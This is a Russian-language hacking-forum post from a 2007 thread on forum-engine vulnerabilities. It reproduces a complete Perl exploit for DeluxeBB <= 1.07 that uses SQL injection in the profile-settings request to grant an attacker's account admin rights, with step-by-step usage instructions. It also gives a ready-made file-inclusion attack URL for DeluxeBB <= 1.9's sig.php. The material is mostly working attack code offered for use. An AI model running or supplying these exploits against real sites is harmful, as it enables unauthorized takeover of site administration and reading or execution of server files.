Тема: [Обзор уязвимостей в форумных движках]
Показать сообщение отдельно

  #3  
Старый 15.04.2007, 17:16
Grey
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию
Форум: DeluxeBB
Версия: <= 1.07

Для этой версии есть эксплойт для получения админских привилегий.

Эксплойт:

Код:
#!/usr/bin/perl
# DeluxeBB <= 1.07 Create Admin Exploit
#
## www.h4ckerz.com / www.hackerz.ir / www.aria-security.net
# ./2006-6-25
### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net

use IO::Socket; 
use LWP::UserAgent;
use HTTP::Cookies;


$host = $ARGV[0];
$uname = $ARGV[1];
$passwd = $ARGV[2];
$url = "http://".$host;

print q(
###########################################################
#          DeluxeBB <= 1.07 Create Admin Exploit          # 
#           www.hackerz.ir - www.h4ckerz.com              #
################### Coded By Hessam-x #####################

);



if (@ARGV < 3) {
print " #  usage : hx.pl [host&path] [uname] [pass]\n"; 
print " #  E.g : hx.pl www.milw0rm.com/deluxebb/ str0ke 123456\n"; 
  exit();
}

  
    print " [~] User/Password : $uname/$passwd \n";
    print " [~] Host : $host \n";
    print " [~] Login ... ";



# Login In DeluxeBB <= 1.07 Create Admin Exploit

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();

$xpl->cookie_jar( $cookie_jar );
$res = $xpl->post($url.'misc.php',
Content => [
"sub" => "login",
"name" => "$uname",
"password" => "$passwd",
"submit" => "Log-in",
"redirect" => "",
"expiry" => "990090909",
],);

  if($cookie_jar->as_string =~ /memberpw=(.*?);/) { 
  print "successfully .\n";
  } else { 
  print "UNsuccessfully !\n";
  print " [-] Can not Login In $host !\n"; 
  print $cookie_jar->as_string;
  exit(); 
  }

  # Creat Admin :)

$req = $xpl->get($url.'cp.php?sub=settings&xemail=h4x0r@h4x0r.net&xhideemail=0
&xmsn=h4x0r\',membercode=\'5&xicq=&xaim=&xyim=&xlocation=&xsite=&languagex=
English&skinx=default&xthetimeoffset=0&xthedateformat=d.m.y&xthetimeformat=12
&invisiblebrowse=0&markposts=15&submit=Update');
$tst = $xpl->get($url.'index.php');
if ($tst->as_string =~ /Admin Cp/) { 
print " [+] You Are Admin Now !!";
} else {
    print " [-] Exploit Failed !";
    }

# milw0rm.com [2006-06-25]
Использование эксплойта:

путь к эксплойту сайт и путь до форума ваш логин ваш пароль

c:\expl.pl http://site.com/forum/ grey 123123

Сайт и путь до форума писать слитно:

http://site.com/forum/ - если форум в директорие forum
http://site.com/bb/ - если форум в директорие bb
http://site.com/ - если форум в корневом каталоге сайта

Резултат работы эксплойта - получение админских привилегий.

------------------------------------------------------------------

Форум: DeluxeBB
Версия: <= 1.9

Из за недостаточной обработки данных в параметре templatefolder есть возможность осуществить php инклюдинг.

На этот раз уязвим сценарий sig.php.

PHP код:
<?php
if($settings['smilies']=='on')
{
include($templatefolder.'/smilies.php');
}
?>
Из кода видно что для инклюда необходимо вывполнение условия $settings['smilies']=='on', а так же наличие %00, т.к. к строке будет добавляться /smilies.php.

В результате:

Код:
http://site.com/templates/deluxe/cp/sig.php?settings[smilies]=on&templatefolder=[file]%00
где [file] - файл, который будет инклюдиться, а settings[smilies]=on присвоение переменной необходимого для инклюда значения.
Последний раз редактировалось Grey; 02.05.2008 в 13:45..
 
Ответить с цитированием